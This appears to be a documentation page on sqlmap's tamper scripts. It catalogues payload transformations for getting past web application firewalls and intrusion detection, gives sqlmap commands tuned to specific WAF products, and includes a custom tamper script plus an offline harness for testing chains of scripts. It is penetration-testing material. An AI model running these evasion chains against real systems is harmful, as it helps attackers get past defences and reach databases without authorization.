Tamper Scripts
Learn how to use SQLMap's tamper scripts to evade detection and bypass security controls
SQLMap's tamper scripts are powerful tools that modify SQL injection payloads to help evade detection by security mechanisms such as Web Application Firewalls (WAFs), Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS).
Understanding Tamper Scripts
Tamper scripts work by transforming the SQL injection payload before it's sent to the target. These transformations can include:
- Character encoding
- Case manipulation
- Whitespace modification
- Comment insertion
- Syntax alterations
- String concatenation
Using Tamper Scripts
Basic Usage
To use a single tamper script:
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between
This applies the between tamper script, which replaces greater than and less than operators with equivalent BETWEEN expressions.
Chaining Multiple Scripts
You can chain multiple tamper scripts, which will be applied in the specified order:
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between,space2comment,randomcase
This applies three tamper scripts in sequence:
- between: Replaces operators with BETWEEN expressions
- space2comment: Replaces spaces with comments
- randomcase: Randomizes the case of SQL keywords
Common Tamper Scripts
Character Encoding Scripts
- base64encode: Encodes all characters in Base64
- charencode: URL-encodes all characters in a payload
- charunicodeencode: Unicode-encodes characters
- hex2char: Replaces hexadecimal encoded characters with their actual character
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=charencode
Whitespace Manipulation Scripts
- space2comment: Replaces spaces with comments
- space2dash: Replaces spaces with dashes followed by a comment
- space2hash: Replaces spaces with hashes followed by a random string and a new line
- space2plus: Replaces spaces with plus signs
- space2randomblank: Replaces spaces with random whitespace characters
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=space2comment
Case Manipulation Scripts
- randomcase: Randomizes the case of SQL keywords
- lowercase: Converts all uppercase characters to lowercase
- uppercase: Converts all lowercase characters to uppercase
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=randomcase
Syntax Modification Scripts
- between: Replaces greater than and less than operators with BETWEEN expressions
- equaltolike: Replaces equal operators with LIKE operators
- greatest: Replaces greater than operator with GREATEST function
- ifnull2ifisnull: Replaces IFNULL with IF(IS NULL)
- modsecurityversioned: Adds versioned MySQL comment
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between,equaltolike
WAF-Specific Tamper Scripts
ModSecurity
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=modsecurityversioned,space2comment,space2hash,charunicodeencode,securesphere
Cloudflare
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=cloudflare
F5 BIG-IP ASM
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=charunicodeencode,space2randomblank,apostrophemask,randomcase
Imperva SecureSphere
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=securesphere
Creating Custom Tamper Scripts
You can create custom tamper scripts to address specific evasion needs:
- Create a Python file in the SQLMap tamper directory
- Define a tamper function that takes and returns a payload
- Implement your transformation logic
Example custom tamper script (mytamper.py):
```python
#!/usr/bin/env python

def tamper(payload, **kwargs):
    """
    Description of your tamper script
    """
    retVal = payload
    if payload:
        # Your transformation logic here
        retVal = payload.replace("SELECT", "SEL/**/ECT")
    return retVal
```
Troubleshooting Tamper Scripts
If you're having issues with tamper scripts:
- Use verbose mode (-v) to see the transformed payloads
- Try different combinations of tamper scripts
- Ensure the tamper scripts are compatible with your target DBMS
- Consider the order of tamper scripts, as it can affect the final payload
- Some tamper scripts may break the syntax for certain injection types
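The custom-script section and the troubleshooting points above (inspect the transformed payload, and mind the order of the scripts) can both be exercised offline. The following is an added example, not code from the page or from sqlmap: it writes the page's mytamper.py into a temporary directory, imports it by path, records every intermediate form of a chain the way verbose mode would display it, and shows with two small stand-ins for space2plus and charencode that reversing the order changes the result. The stand-in functions, the temporary path and the sample strings are assumptions of the example.

```python
import importlib.util
import os
import tempfile
from urllib.parse import quote

# Constructed copy of the page's mytamper.py, written to a temporary directory
# so the loader below has a file to import. The path is a placeholder, not
# sqlmap's tamper directory.
DEMO_TAMPER_SOURCE = '''
def tamper(payload, **kwargs):
    """Demo: split the SELECT keyword with an inline comment"""
    retVal = payload
    if payload:
        retVal = payload.replace("SELECT", "SEL/**/ECT")
    return retVal
'''


def write_demo_tamper(directory: str) -> str:
    path = os.path.join(directory, "mytamper.py")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(DEMO_TAMPER_SOURCE)
    return path


def load_tamper(path: str):
    """Import a tamper script by file path and return its tamper() callable."""
    name = os.path.splitext(os.path.basename(path))[0]
    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    if not callable(getattr(module, "tamper", None)):
        raise ValueError(f"{path}: no tamper(payload, **kwargs) function defined")
    return module.tamper


# Minimal stand-ins (constructed) for two scripts named on the page.
def space2plus(payload, **kwargs):
    return payload.replace(" ", "+")


def charencode(payload, **kwargs):
    return quote(payload, safe="")   # percent-encode every character


def apply_chain(payload, steps):
    """Apply scripts in order and keep each intermediate form, as -v would show."""
    trace = [payload]
    for step in steps:
        payload = step(payload)
        trace.append(payload)
    return payload, trace


def ordering_demo(payload="1 AND 1=1"):
    """Run space2plus and charencode in both orders; the outputs differ."""
    first, _ = apply_chain(payload, [space2plus, charencode])
    second, _ = apply_chain(payload, [charencode, space2plus])
    return first, second


def custom_script_demo():
    """Load the demo script from disk and chain it with space2plus."""
    with tempfile.TemporaryDirectory() as tmp:
        tamper = load_tamper(write_demo_tamper(tmp))
        return apply_chain("1 UNION SELECT 1", [tamper, space2plus])


if __name__ == "__main__":
    final, trace = custom_script_demo()
    for form in trace:
        print(form)
    print(ordering_demo())
```

With space2plus first, charencode then percent-encodes the plus signs it produced; with charencode first, no spaces remain for space2plus to touch, so the two chains emit different strings from the same input. The same harness is a cheap place to confirm that a custom script still returns a string for every input before it is dropped into the tamper directory.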